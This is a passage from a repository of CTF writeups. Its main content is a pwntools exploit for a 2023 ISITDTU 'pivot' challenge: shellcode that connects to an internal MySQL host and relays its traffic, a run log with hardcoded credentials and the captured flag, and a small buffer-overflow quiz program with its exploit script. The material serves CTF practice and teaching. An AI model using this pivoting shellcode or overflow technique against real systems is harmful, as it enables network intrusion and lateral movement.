log.info("Run command: mysql --skip-ssl -h localhost -P 33066 -u isitdtu --password=qp37RWf@@Ygvd@ fl4g -e 'select * from fl4g'") 15 | l = listen(33066) 16 | 17 | def server_read(): 18 | log.info("server_read") 19 | data = l.recv(0x500) 20 | r.send(data) 21 | return data 22 | 23 | def server_write(): 24 | log.info("server_write") 25 | data = r.recv(0x500) 26 | l.send(data) 27 | return data 28 | 29 | def shell_server2client(): 30 | shell = pwnlib.shellcraft.amd64.linux.read('rbp', 'r10', 0x500) 31 | shell += pwnlib.shellcraft.amd64.linux.write(1, 'r10', 'rax') 32 | return shell 33 | 34 | def shell_client2server(): 35 | shell = pwnlib.shellcraft.amd64.linux.read(0, 'r10', 0x500) 36 | shell += pwnlib.shellcraft.amd64.linux.write('rbp', 'r10', 'rax') 37 | return shell 38 | 39 | def gen_shellcode(): 40 | host = '10.10.10.3' 41 | port = 3306 42 | shellcode = asm( 43 | """ 44 | push 0x404108 45 | pop r10 46 | """ + 47 | pwnlib.shellcraft.amd64.linux.connect(host, port) + 48 | shell_server2client()+ 49 | shell_client2server()+ 50 | shell_server2client()+ 51 | """ 52 | cmp byte ptr [r10+5], 0x3 53 | je s2c 54 | loop: 55 | """+ 56 | shell_client2server()+ 57 | """ 58 | s2c: 59 | """+ 60 | shell_server2client()+ 61 | """ 62 | jmp loop 63 | """ 64 | ) 65 | return shellcode 66 | 67 | def py_read_write(): 68 | server_write() 69 | server_read() 70 | data = server_write() 71 | if data[5] == 3: 72 | log.info("plaintext") 73 | server_write() 74 | else: 75 | log.info("pubkey") 76 | 77 | while 1: 78 | data = server_read() 79 | if data == b'\x01\x00\x00\x00\x01': 80 | log.info("Done") 81 | exit() 82 | server_write() 83 | 84 | shellcode = gen_shellcode() 85 | r.recv(10) 86 | 87 | _ = l.wait_for_connection() 88 | r.send(shellcode) 89 | py_read_write() 90 | r.interactive() 91 | 92 | pivot(sys.argv[1]) 93 | """ 94 | $ python pivot.py 2 95 | [+] Opening connection to 34.126.117.161 on port 9999: Done 96 | [*] Run command: mysql --skip-ssl -h localhost -P 33066 -u isitdtu --password=qp37RWf@@Ygvd@ fl4g -e 'select * from fl4g' 97 | [+] Trying to bind to :: on port 33066: Done 98 | [+] Waiting for connections on :::33066: Got connection from ::ffff:127.0.0.1 on port 35620 99 | [*] server_write 100 | [*] server_read 101 | [*] server_write 102 | [*] plaintext 103 | [*] server_write 104 | [*] server_read 105 | [*] server_write 106 | [*] server_read 107 | [*] Done 108 | [*] Closed connection to ::ffff:127.0.0.1 port 35620 109 | [*] Closed connection to 34.126.117.161 port 9999 110 | 111 | $ mysql --skip-ssl -h localhost -P 33066 -u isitdtu --password=qp37RWf@@Ygvd@ fl4g -e 'select * from fl4g' 112 | +--------------------------------------+ 113 | | flag | 114 | +--------------------------------------+ 115 | | ISITDTU{piv0t_i5_n0T_v3ry_diFficUlT} | 116 | +--------------------------------------+ 117 | """ -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pivot_docker.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2023/ISITDTU CTF QUALS 2023/pivot/pivot_docker.tar.gz -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/plaintext.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2023/ISITDTU CTF QUALS 2023/pivot/plaintext.pcap -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pubkey.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2023/ISITDTU CTF QUALS 2023/pivot/pubkey.pcap -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ctf-writeups 2 | -------------------------------------------------------------------------------- /quiz/cau48/cau48: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/quiz/cau48/cau48 -------------------------------------------------------------------------------- /quiz/cau48/cau48.c: -------------------------------------------------------------------------------- 1 | // gcc cau48.c -m32 -o cau48 -fno-stack-protector 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | char global[0x200]; 8 | int f1(); 9 | int x(int p0, int p1); 10 | int main() 11 | { 12 | f1(); 13 | } 14 | 15 | int f(){ 16 | char str[0x100]; 17 | fgets(global, 0x200, stdin); 18 | strncpy(str, global, 0x100); 19 | sprintf(global, "Hello %s\n", str); 20 | printf("global len: %#x", strlen(global)); 21 | exit(1); 22 | } 23 | int f1() 24 | { 25 | char s[0x200]; 26 | memset(s, 'B', 0x200); 27 | x(0x90909090, 0x90909090); 28 | f(); 29 | } 30 | int x(int p0, int p1){ 31 | return p0+p1; 32 | } -------------------------------------------------------------------------------- /quiz/cau48/cau48.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def cau48(): 6 | r = process("./cau48") 7 | raw_input("debug?") 8 | r.send("C"*0x300) 9 | print r.recv() 10 | r.interactive() 11 | 12 | cau48() --------------------------------------------------------------------------------